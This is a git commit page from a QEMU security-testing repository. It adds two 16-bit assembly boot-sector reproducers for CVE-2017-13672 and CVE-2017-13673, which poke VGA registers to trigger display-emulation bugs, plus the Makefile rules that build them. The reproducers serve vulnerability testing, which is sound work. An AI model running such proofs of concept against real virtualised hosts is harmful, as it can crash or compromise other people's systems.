diff options
| author | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:02 +0200 |
|---|---|---|
| committer | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:24 +0200 |
| commit | 2339ec544399cd66930643817ba1cb1094ddccfa (patch) | |
| tree | 1a4f3edf18b81f1b628bdea7e1ddd9910f6bd9ef | |
| parent | 1808bb759313e69205f828d49fe9ffbcb1859377 (diff) | |
| download | qemu-security-2339ec544399cd66930643817ba1cb1094ddccfa.tar.gz | |
add cve-2017-13672 + cve-2017-13673 reproducers
| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | Makefile | 6 | ||||
| -rw-r--r-- | boot-cve-2017-13672.asm | 25 | ||||
| -rw-r--r-- | boot-cve-2017-13673.asm | 51 |
4 files changed, 82 insertions, 1 deletions
@@ -1,3 +1,4 @@ cve-[0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9] +boot-*.raw *.o *~ @@ -6,7 +6,8 @@ CFLAGS += -Wall CVETEST := cve-2016-3712 PCITEST := cve-2017-2615 cve-2017-2620 USBTEST := cve-2017-5898 -TARGETS := $(CVETEST) $(PCITEST) $(USBTEST) +RAWTEST := boot-cve-2017-13672.raw boot-cve-2017-13673.raw +TARGETS := $(CVETEST) $(PCITEST) $(USBTEST) $(RAWTEST) DEPENDS := libpci libusb-1.0 $(PCITEST) : CFLAGS += $(shell pkg-config --cflags libpci) @@ -40,6 +41,9 @@ clean: rm -f $(TARGETS) rm -f *~ *.o +boot-%.raw: boot-%.asm + nasm -o $@ $< + cve-2017-2615: cve-2017-2615.o pci.o cirrus.o cve-2017-2620: cve-2017-2620.o pci.o cirrus.o cve-2017-5898: cve-2017-5898.o usb.o diff --git a/boot-cve-2017-13672.asm b/boot-cve-2017-13672.asm new file mode 100644 index 0000000..2d9ca9d --- /dev/null +++ b/boot-cve-2017-13672.asm @@ -0,0 +1,25 @@ +; From: David Buchanan <d@vidbuchanan.co.uk> +; +; compiles to boot sector, pass as disk to qemu to run the code. +; + BITS 16 + + ORG 0x7C00 + + mov ax, 0x4F02 + mov bx, 0x4118 ; 1024x768x24, LFB enabled + int 0x10 ; init VESA graphics via BIOS + + mov dx, 0x3d4 + mov al, 0x1d + out dx, al + + mov dx, 0x3d5 + in al, dx + or al, 0x80 + out dx, al + + jmp $ + + TIMES 510-($-$$) DB 0 + DW 0xAA55 ; boot signature diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm new file mode 100644 index 0000000..21d5f3d --- /dev/null +++ b/boot-cve-2017-13673.asm @@ -0,0 +1,51 @@ +; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+ BITS 16
+
+ ORG 0x7C00
+
+ mov dx, 0x3d4 ; start_addr high byte
+ mov al, 0x0c
+ out dx, al
+
+ mov dx, 0x3d5
+ mov al, 0xff
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x07
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x10
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x09
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x40
+ out dx, al
+
+
+ mov dx, 0x3ce ; gfx mode
+ mov al, 0x06
+ out dx, al
+
+ mov dx, 0x3cf
+ mov al, 0x01
+ out dx, al
+
+
+ jmp $
+
+ TIMES 510-($-$$) DB 0
+ DW 0xAA55 ; boot signature
|